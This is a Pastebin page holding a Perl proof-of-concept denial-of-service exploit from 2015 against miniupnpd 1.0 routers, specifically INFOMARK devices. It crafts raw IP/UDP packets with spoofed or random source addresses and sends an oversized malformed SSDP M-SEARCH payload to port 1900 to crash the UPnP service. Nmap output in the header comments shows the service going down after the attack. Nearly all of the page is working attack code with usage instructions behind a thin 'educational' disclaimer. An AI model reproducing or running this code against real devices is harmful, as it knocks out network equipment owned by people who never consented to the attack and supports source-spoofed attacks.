API tools faq
paste
Guest User

miniupnpd/1.0 DoS or stack overflow (PoC) by Todor Donev

a guest
Jul 11th, 2015
245
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 7.49 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #
  3. #  miniupnpd/1.0 remote denial of service or stack overflow (PoC)
  4. #
  5. #  Copyright 2015 (c) Todor Donev
  6. #  todor.donev@gmail.com
  7. #  http://www.ethical-hacker.org/
  8. #  https://www.facebook.com/ethicalhackerorg
  9. #
  10. #  The SSDP protocol can discover Plug & Play devices,
  11. #  with uPnP (Universal Plug and Play). SSDP is HTTP
  12. #  like protocol and work with NOTIFY and M-SEARCH
  13. #  methods.  
  14. #
  15. #  See also:
  16. #  CVE-2013-0229
  17. #  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229  
  18. #  CVE-2013-0230
  19. #  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
  20. #  
  21. #  Tested on
  22. #  Device Name :            IMW-C920W
  23. #  Device Manufacturer :    INFOMARK (http://infomark.co.kr)
  24. #  
  25. #  These devices are commonly used by Max Telecom, Bulgaria
  26. #
  27. #  Disclaimer:
  28. #  This or previous program is for Educational
  29. #  purpose ONLY. Do not use it without permission.
  30. #  The usual disclaimer applies, especially the
  31. #  fact that Todor Donev is not liable for any
  32. #  damages caused by direct or indirect use of the
  33. #  information or functionality provided by these
  34. #  programs. The author or any Internet provider
  35. #  bears NO responsibility for content or misuse
  36. #  of these programs or any derivatives thereof.
  37. #  By using these programs you accept the fact
  38. #  that any damage (dataloss, system crash,
  39. #  system compromise, etc.) caused by the use
  40. #  of these programs is not Todor Donev's
  41. #  responsibility.
  42. #  
  43. #  Use at your own risk!
  44. #
  45. #  See also:
  46. #  SSDP Reflection DDoS Attacks
  47. #  http://tinyurl.com/mqwj6xt
  48. #
  49. #######################################
  50. #
  51. # # perl miniupnpd.pl
  52. #
  53. # [  miniupnpd/1.0 remote denial of service exploit ]
  54. # [ =============================================== ]
  55. # [  Usage:              
  56. # [ ./miniupnpd.pl <victim address> <spoofed address>
  57. # [  Example:
  58. # [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
  59. # [  Example:
  60. # [ perl miniupnpd.pl 192.168.1.1
  61. # [ =============================================== ]
  62. # [ 2015  <todor.donev@gmail.com> Todor Donev  2015 ]
  63. #
  64. # # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
  65. #
  66. # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
  67. # Nmap scan report for 192.168.1.1
  68. # Host is up (0.00078s latency).
  69. # PORT     STATE SERVICE
  70. # 1900/udp open  upnp
  71. # | upnp-info:
  72. # | 192.168.1.1
  73. # |     Server: 1.0 UPnP/1.0 miniupnpd/1.0
  74. # |     Location: http://192.168.1.1:5000/rootDesc.xml
  75. # |       Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
  76. # |       Name: INFOMARK Router
  77. # |       Manufacturer: INFOMARK
  78. # |       Model Descr: INFOMARK Router
  79. # |       Model Name: INFOMARK Router
  80. # |       Model Version: 1
  81. # |       Name: WANDevice
  82. # |       Manufacturer: MiniUPnP
  83. # |       Model Descr: WAN Device
  84. # |       Model Name: WAN Device
  85. # |       Model Version: 20070228
  86. # |       Name: WANConnectionDevice
  87. # |       Manufacturer: MiniUPnP
  88. # |       Model Descr: MiniUPnP daemon
  89. # |       Model Name: MiniUPnPd
  90. # |_      Model Version: 20070228
  91. # MAC Address: 00:00:00:00:00:00 (Infomark Co.)           // CENSORED
  92. #  
  93. # Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
  94. #
  95. # # perl miniupnpd.pl 192.168.1.1
  96. #
  97. # [  miniupnpd/1.0 remote denial of service exploit ]
  98. # [ =============================================== ]
  99. # [ Target: 192.168.1.1
  100. # [ Send malformed SSDP packet..
  101. #
  102. # # nmap -sU 192.168.1.1 -p1900
  103. #  
  104. # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
  105. # Nmap scan report for 192.168.1.1
  106. # Host is up (0.00085s latency).
  107. # PORT     STATE  SERVICE
  108. # 1900/udp closed upnp                                    // GOOD NIGHT, SWEET PRINCE.... :D
  109. # MAC Address: 00:00:00:00:00:00 (Infomark Co.)           // CENSORED
  110. #  
  111. # Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
  112. #
  113. #
  114. # Special thanks to HD Moore ..
  115. #
  116.  
  117. use Socket;
  118.  
  119. if ( $< != 0 ) {
  120.    print "Sorry, must be run as root!\n";
  121.    print "This script use RAW Socket.\n";
  122.    exit;
  123. }
  124.  
  125. my $ip_src = (gethostbyname($ARGV[1]))[4];
  126. my $ip_dst = (gethostbyname($ARGV[0]))[4];
  127.  
  128. print "\n[  miniupnpd/1.0 remote denial of service exploit ]\n";
  129. print "[ =============================================== ]\n";
  130. select(undef, undef, undef, 0.40);
  131.  
  132. if (!defined $ip_dst) {
  133.     print "[  Usage:\n[ ./$0 <victim address> <spoofed address>\n";
  134.     select(undef, undef, undef, 0.55);
  135.     print "[  Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
  136.     print "[  Example:\n[ perl $0 192.168.1.1\n";
  137.     print "[ =============================================== ]\n";
  138.     print "[ 2015  <todor.donev\@gmail.com> Todor Donev  2015 ]\n\n";
  139.     exit;
  140. }
  141. socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
  142. setsockopt(RAW, 0, 1, 1) or die $!;
  143. main();
  144.  
  145.     # Main program
  146. sub main {
  147.     my $packet;
  148.    
  149.     $packet = iphdr();
  150.     $packet .= udphdr();
  151.     $packet .= payload();
  152.     # b000000m...
  153.     send_packet($packet);
  154. }
  155.  
  156.     # IP header (Layer 3)
  157. sub iphdr {
  158.     my $ip_ver           = 4;                       # IP Version 4            (4 bits)
  159.     my $iphdr_len        = 5;                        # IP Header Length        (4 bits)
  160.     my $ip_tos           = 0;                        # Differentiated Services (8 bits)
  161.     my $ip_total_len     = $iphdr_len + 20;          # IP Header Length + Data (16 bits)
  162.     my $ip_frag_id       = 0;                        # Identification Field    (16 bits)
  163.     my $ip_frag_flag     = 000;                      # IP Frag Flags (R DF MF) (3 bits)
  164.     my $ip_frag_offset   = 0000000000000;            # IP Fragment Offset      (13 bits)
  165.     my $ip_ttl           = 255;                      # IP TTL                  (8 bits)
  166.     my $ip_proto         = 17;                       # IP Protocol             (8 bits)
  167.     my $ip_checksum      = 0;                        # IP Checksum             (16 bits)
  168.     my $ip_src=gethostbyname(&randip) if !$ip_src;     # IP Source       (32 bits)
  169.     # IP Packet construction
  170.   my $iphdr  = pack(
  171.         'H2 H2 n n B16 h2 c n a4 a4',
  172.         $ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
  173.         $ip_frag_id, $ip_frag_flag . $ip_frag_offset,
  174.         $ip_ttl, $ip_proto, $ip_checksum,
  175.         $ip_src, $ip_dst
  176.       );
  177.  
  178.         return $iphdr;
  179. }
  180.  
  181.     # UDP header (Layer 4)
  182. sub udphdr {
  183.     my $udp_src_port  = 31337;                     # UDP Sort Port           (16 bits) (0-65535)
  184.     my $udp_dst_port  = 1900;                       # UDP Dest Port           (16 btis) (0-65535)
  185.     my $udp_len    = 8 + length(payload());     # UDP Length              (16 bits) (0-65535)
  186.     my $udp_checksum   = 0;                         # UDP Checksum            (16 bits) (XOR of header)
  187.  
  188.     # UDP Packet
  189.       my $udphdr      = pack(
  190.         'n n n n',
  191.         $udp_src_port, $udp_dst_port,
  192.         $udp_len, $udp_checksum
  193.         );
  194.         return $udphdr;
  195. }
  196.  
  197.     # Create SSDP Bomb
  198. sub payload {
  199.      my $data;
  200.      my $head;
  201.      $data = "M-SEARCH * HTTP\/1.1\\r\\n";
  202.      for (0..1260) { $data .= chr( int(rand(25) + 65) ); }
  203.      my $payload = pack('a' . length($data), $data);
  204. return $payload;
  205. }
  206.  
  207.     # Generate random source ip address
  208. sub randip () {
  209. srand(time() ^ ($$ + ($$ << 15)));
  210.      my $ipdata;
  211.         $ipdata   = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
  212.      my $ipsrc     = pack('A' . length($ipdata), rand($ipdata));
  213. return $ipdata;
  214. }
  215.  
  216.     # Send the malformed packet
  217. sub send_packet {
  218.     print "[ Target: $ARGV[0]\n";
  219.     select(undef, undef, undef, 0.30);
  220.     print "[ Send malformed SSDP packet..\n\n";
  221.     send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
  222. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!